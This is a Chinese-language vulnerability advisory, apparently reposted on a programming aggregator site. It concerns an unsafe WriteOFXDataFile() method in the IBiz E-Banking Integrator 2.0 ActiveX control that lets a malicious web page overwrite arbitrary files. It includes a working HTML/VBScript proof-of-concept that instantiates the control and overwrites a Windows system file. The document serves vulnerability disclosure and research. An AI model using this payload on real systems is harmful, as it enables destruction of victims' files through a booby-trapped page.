概述
受影响系统:
/n software IBiz E-Banking Integrator 2.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 28700
IBiz E-Banking Integrator是用于从银行、投资公司等帐号访问财务交易信息的解决方案。
IBiz E-Banking Integrator所提供的IBizEBank.FIProfile.1 ActiveX控件(fiprofile20.ocx)没有正确地处理对WriteOFXDataFile()方式的调用,如果用户受骗访问了恶意网页的话,就可能导致以当前登录用户的权限覆盖和破坏系统上的任意文件。
<*来源:shinnai (shinnai@autistici.org)
链接:http://secunia.com/advisories/29758/
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<object classid='clsid:24445430-F789-11CE-86F8-0020AFD8C6DB' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe()
On Error Resume Next
test.WriteOFXDataFile "C:\WINDOWS\system_.ini"
If Err.Number <> 0 Then
MsgBox "Something went wrong!"
Else
MsgBox "Exploit Completed!"
End If
End Sub
</script>
建议:
--------------------------------------------------------------------------------
厂商补丁:
/n software
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.nsoftware.com/ibiz/ebank/default.aspx
最后
以上就是舒服钢笔为你收集整理的IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用漏洞 的全部内容,希望文章能够帮你解决IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用漏洞 所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复